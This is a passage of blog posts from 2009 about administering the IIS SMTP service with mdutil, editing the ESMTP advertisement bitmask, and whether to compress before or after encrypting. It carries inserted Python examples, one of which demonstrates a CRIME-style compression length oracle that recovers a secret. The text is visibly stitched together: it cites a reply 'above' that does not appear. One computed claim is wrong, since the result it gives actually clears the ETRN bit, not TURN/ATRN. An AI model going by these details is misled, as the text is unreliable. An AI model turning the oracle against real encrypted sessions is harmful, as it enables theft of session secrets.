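    """Parse the listing and return the full command list. Any malformed line raises,
    so a typo never silently creates a mis-routed domain."""
    commands, seen = [], set()
    for lineno, raw in enumerate(listing.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()  # allow comments and blank lines
        if not line:
            continue
        parts = [p.strip().lower() for p in line.split(",")]
        if len(parts) != 2:
            raise ValueError(f"line {lineno}: expected 'domain,local|remote'")
        domain, action = parts
        if action not in ROUTING_ACTION:
            raise ValueError(f"line {lineno}: unknown routing action {action!r}")
        if len(domain) > 253 or not DOMAIN_RE.match(domain):
            raise ValueError(f"line {lineno}: invalid domain name {domain!r}")
        if domain in seen:
            raise ValueError(f"line {lineno}: duplicate domain {domain!r}")
        seen.add(domain)
        commands.extend(commands_for(domain, action, instance))
    return commands


def is_valid_listing(listing):
    """True if generate() accepts the listing, False if it would raise."""
    try:
        generate(listing)
        return True
    except ValueError:
        return False


# Constructed listing of routing domains to import.
LISTING = """# domain,action
log0.onhacks.org,local
dothac.onhacks.org,remote
"""

if __name__ == "__main__":
    # Write a batch file to run on the IIS host: python gen.py > import-domains.cmd
    sys.stdout.write("\r\n".join(generate(LISTING)) + "\r\n")
```

After running the generated batch file, run "mdutil enum -path:smtpsvc/1/Domain" again and compare the listed children against the input file; the generator refuses duplicates precisely because CREATE on an existing path is the kind of error that is easy to miss in thirty lines of output.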

Enjoy! Happy New Year!

PS. Does anyone know whether mdutil can access the properties of the DNS server? I would like to switch the DNS referral feature on/off in Windows DNS Server.

Email, Windows

Enable/Disable ESMTP advertisement

by .hac on January 3rd, 2009

Simple Mail Transfer Protocol (SMTP) is the basic protocol for message delivery on the network. As you may know, it is a very simple protocol; you can imagine it is so simple that it was designed without much consideration for security. However, I am not going to discuss the bugs in the specification; I want to cover some non-security stuff related to Extended SMTP (ESMTP). After the SMTP RFC was published, people noticed that SMTP was not enough to fulfil their requirements for mail delivery, so they started designing extensions. The most commonly used extensions are: Delivery Status Notification (DSN), Transport Layer Security (STARTTLS), Authenticated SMTP (SMTP-AUTH) and SIZE.

These few days, I have been looking at how to disable some extensions in the IIS virtual SMTP server; more accurately, it is an ESMTP server. If you have tried setting up an IIS virtual SMTP server yourself, you know there is no GUI for disabling these extensions. However, if you search the Internet, there are at least two ways to enable/disable them. One is to use Windows Script (WScript) to take the SMTP server as an object and configure the extensions by assigning values to its properties. The other is to use Mdutil.exe to edit the metabase key that controls which extensions the SMTP server advertises. In this entry, I am going to cover in detail how to use Mdutil.exe to modify that key.

Mdutil.exe is a metabase key editor. By default, mdutil.exe is not installed with Windows. You can find it on the install CD; on the Windows 2000 CD its name is Mdutil.ex_, which is a compressed file, so copy it to your computer and expand it with expand.exe (expand Mdutil.ex_ Mdutil.exe) rather than just renaming it. After that, you should first determine how many SMTP Virtual Server instances are configured, using the following command:

Mdutil.exe enum -path:smtpsvc

You are suppose to see something similar to the following:

  • [/smtpsvc/1]
  • [/smtpsvc/2]
  • [/smtpsvc/3]

Each entry represents a virtual SMTP server instance. Look in the Microsoft Management Console (MMC) to find the virtual SMTP server instance you want to modify; the instances are listed there from top to bottom in the same order as above.

You can use the following command to obtain the current property value, where <n> is the number of the SMTP server instance you want to modify.

Mdutil.exe get -path:smtpsvc/<n> -prop:36998

If you receive the error message "Error: GetData - HRES(0x800cc801) MD_ERROR_DATA_NOT_FOUND", metabase property 36998 is not stored in the properties of this SMTP server instance, so the default applies. Otherwise you will see the value, like this:

36998 : [IS] (DWORD) 0x7574c1={7697601}

Then let's look at which extensions we can configure. Each verb corresponds to one bit of the property value:

Verb                 Value     Hex value
DSN                  64        0x40
ETRN                 128       0x80
TURN/ATRN            1024      0x400
ENHANCEDSTATUSCODES  4096      0x1000
CHUNKING             1048576   0x100000
BINARYMIME           2097152   0x200000
8BITMIME             4194304   0x400000

Then the rule is very simple: to disable an advertisement, clear its bit in the property value; to enable one, set its bit. Subtracting or adding the value, as is often suggested, only gives the same result if the bit is currently set (respectively clear): subtracting the value of a verb that is already disabled borrows from other bits and corrupts the setting, so always read the current value first. For example, the original value is 0x7574c1 and I want to disable DSN (DSN is enabled by default, and the original value includes its bit 0x40), so the new value is 0x7574c1 - 0x40 = 0x757481. To assign the new value, run the following command.

Mdutil.exe set -path:smtpsvc/<n> -prop:36998 -utype:UT_SERVER -dtype:DWORD -attrib:INHERIT -value:0x757481

By changing the -value argument, you can set property 36998 to a different value. Then connect to your SMTP server (telnet to port 25) and check the new list of extensions by typing EHLO followed by a host name.
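Adding and subtracting only works when you already know the bit's current state, which is easy to get wrong with a value like 0x7574c1 that also carries bits the table does not name. The following added example (mine, not from the post or from Microsoft) decodes the value printed by mdutil get, flips verbs with bitwise operations so that disabling an already-disabled verb is harmless, and prints the mdutil set command; the verb values are those from the table above and the instance number is assumed to be 1.

```python
"""Decode and edit the IIS SMTP ESMTP-advertisement bitmask (metabase property
36998) with bit operations rather than add/subtract (added example)."""
import re

VERBS = {  # values from the table in the post
    "DSN": 0x40, "ETRN": 0x80, "TURN/ATRN": 0x400, "ENHANCEDSTATUSCODES": 0x1000,
    "CHUNKING": 0x100000, "BINARYMIME": 0x200000, "8BITMIME": 0x400000,
}
KNOWN_MASK = 0
for _bit in VERBS.values():
    KNOWN_MASK |= _bit


def parse_mdutil_get(output):
    """Parse '36998 : [IS] (DWORD) 0x7574c1={7697601}' into an int."""
    m = re.search(r"0x([0-9a-fA-F]+)", output)
    if not m:
        raise ValueError("no hex value in mdutil output: " + output)
    return int(m.group(1), 16)


def advertised(value):
    """Verb names whose bit is set in value."""
    return sorted(v for v, bit in VERBS.items() if value & bit)


def unknown_bits(value):
    """Bits set in value that the table does not name; leave them alone."""
    return value & ~KNOWN_MASK


def disable(value, verb):
    return value & ~VERBS[verb]  # clearing an already-clear bit changes nothing


def enable(value, verb):
    return value | VERBS[verb]


def subtract_naively(value, verb):
    """The add/subtract rule: correct only if the bit is currently set."""
    return value - VERBS[verb]


def mdutil_set(value, instance=1):
    return (f"Mdutil.exe set -path:smtpsvc/{instance} -prop:36998 -utype:UT_SERVER "
            f"-dtype:DWORD -attrib:INHERIT -value:0x{value:x}")


if __name__ == "__main__":
    current = parse_mdutil_get("36998 : [IS] (DWORD) 0x7574c1={7697601}")  # value from the post
    print("advertised:", advertised(current), "unnamed bits: 0x%x" % unknown_bits(current))
    new = disable(current, "DSN")
    print(mdutil_set(new))
    print("DSN subtracted twice: 0x%x" % subtract_naively(subtract_naively(current, "DSN"), "DSN"))
```

Running it on the post's value shows all seven verbs set plus 0x56001 of unnamed bits; subtracting 0x40 a second time turns the value into 0x757441, which silently alters the 0x400 (TURN/ATRN) bit, while disable() applied twice still gives 0x757481.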

This is just a very brief introduction to Mdutil.exe; I think it has great power to modify other metabase keys of applications on Windows.

Hope you enjoy!


Email, Windows

Encryption VS Compression

by .hac on January 1st, 2009

There is a huge amount of mail flowing between different email servers every day. At the same time, in most countries bandwidth is what your bill is measured in. If you host an email server, you may always want to minimize the bandwidth you use. The trivial solution is to compress messages when the server delivers them. Compression is a very general technique for minimizing the storage size of data; there are two main categories, lossless and lossy. When compressing email messages, lossless compression must be used to make sure the data is intact after the compression-decompression cycle. Among the RFCs, a few well-known lossless compression methods are deployed for different protocols (e.g. TLS, PPP): DEFLATE, gzip and LZW. Of course, there are also non-standardized compression methods for protocols.

An email server should use a secure channel when delivering sensitive messages; in general, we should use a secure channel whenever we transmit data over the network. Transport Layer Security (TLS) is one way to provide such a channel. TLS is a stateful cryptographic protocol: during its handshake it uses asymmetric cryptography to authenticate the peer and agree on the symmetric session keys that sender and receiver then use to protect the rest of the communication.

Finally, after this long introduction, I would like to raise a question. If I want both to minimize the bandwidth used by a transmission and to secure it, I have to compress and encrypt the data before delivering it. What is the difference between compress-encrypt (compressed data in a secure channel) and encrypt-compress (encrypted data in a compressed channel)? What are the advantages and disadvantages of the two approaches? IMO, compress-encrypt may be more secure because the encryption encapsulates the whole message. Although encrypt-compress is also secure, it may expose the length of the message when looking at the compression history. Both require the input block sizes of compression and encryption to match, otherwise buffering is required during transmission. An advantage of encrypt-compress is that the compressor's input block size is guaranteed to be fixed, since in most cases the bulk encryption is a block cipher whose block size is a power of two (for example 128 bits for AES).

There are existing compression standards for encryption protocols (e.g. TLS compression). Feel free to take a look; maybe you can come up with some ideas on the advantages and disadvantages of the two approaches. I am looking forward to discussing them with you.
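To put numbers on the question (and on LP's answer in the "RE : Encryption VS Compression" post above), here is an added example that is not from either post. It compresses-then-encrypts and encrypts-then-compresses the same redundant message and reports the sizes, and it also shows the one security cost of compress-then-encrypt that the question above hints at: the ciphertext length reveals how well the plaintext compressed, so an attacker who can place a guess next to a secret in the same compressed record learns whether the guess was right. That is the mechanism behind the CRIME attack on TLS compression (2012), which is why TLS 1.3 dropped compression altogether. The cipher is a toy SHA-256 counter-mode stream cipher used only so the example runs with the standard library; the message, key, nonce and secret are constructed.

```python
"""Compress-then-encrypt vs encrypt-then-compress, measured, plus the
compression length side channel (added example; toy cipher, not for real use)."""
import hashlib
import zlib


def toy_stream_encrypt(key, nonce, data):
    """XOR data with SHA-256(key || nonce || counter) blocks. Output is pseudorandom,
    which is all the comparison needs. NOT a production cipher; decrypt = encrypt."""
    stream = b"".join(hashlib.sha256(key + nonce + ctr.to_bytes(8, "big")).digest()
                      for ctr in range((len(data) + 31) // 32))
    return bytes(a ^ b for a, b in zip(data, stream))


def compress_then_encrypt(key, nonce, msg):
    return toy_stream_encrypt(key, nonce, zlib.compress(msg, 9))


def encrypt_then_compress(key, nonce, msg):
    return zlib.compress(toy_stream_encrypt(key, nonce, msg), 9)


def decrypt_compressed(key, nonce, blob):
    """Inverse of compress_then_encrypt."""
    return zlib.decompress(toy_stream_encrypt(key, nonce, blob))


def sizes(msg, key, nonce):
    return {"plain": len(msg),
            "compress_then_encrypt": len(compress_then_encrypt(key, nonce, msg)),
            "encrypt_then_compress": len(encrypt_then_compress(key, nonce, msg))}


def ciphertext_length(secret, injected, key, nonce):
    """Length oracle: the attacker controls `injected` (say, a URL query string) and
    the secret travels in the same compressed record (say, a Cookie header)."""
    record = b"GET /?q=" + injected + b" HTTP/1.1\r\nCookie: secret=" + secret + b"\r\n"
    return len(compress_then_encrypt(key, nonce, record))


def leak_demo(secret, key, nonce):
    """Compare a correct guess of the secret with a wrong one of the same length.
    The correct guess compresses away as a back-reference, so its record is shorter."""
    wrong = b"1234567890" + b"0987654321" + b"135792"  # same length, no shared 3-grams
    return {"correct_guess": ciphertext_length(secret, b"secret=" + secret, key, nonce),
            "wrong_guess": ciphertext_length(secret, b"secret=" + wrong, key, nonce)}


# Constructed inputs.
KEY, NONCE = b"k" * 32, b"n" * 8
SAMPLE_MAIL = b"Subject: weekly report\r\n\r\n" + b"The quick brown fox jumps over the lazy dog. " * 40
SECRET = b"qwertyuiopasdfghjklzxcvbnm"  # 26 distinct letters: nothing the compressor can reuse by itself

if __name__ == "__main__":
    print(sizes(SAMPLE_MAIL, KEY, NONCE))
    print(leak_demo(SECRET, KEY, NONCE))
```

The size comparison confirms LP's point: compressing the ciphertext does not even recover the zlib framing overhead. The leak demo is the caveat to "no security compromise per se": with a byte-at-a-time search instead of a full guess, the same oracle recovers the secret, which is what CRIME did against session cookies. If you compress before encrypting, keep attacker-controlled data and secrets out of the same compression context, or do not compress at all.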

Thoughts, comments, and suggestions are always welcome!

Email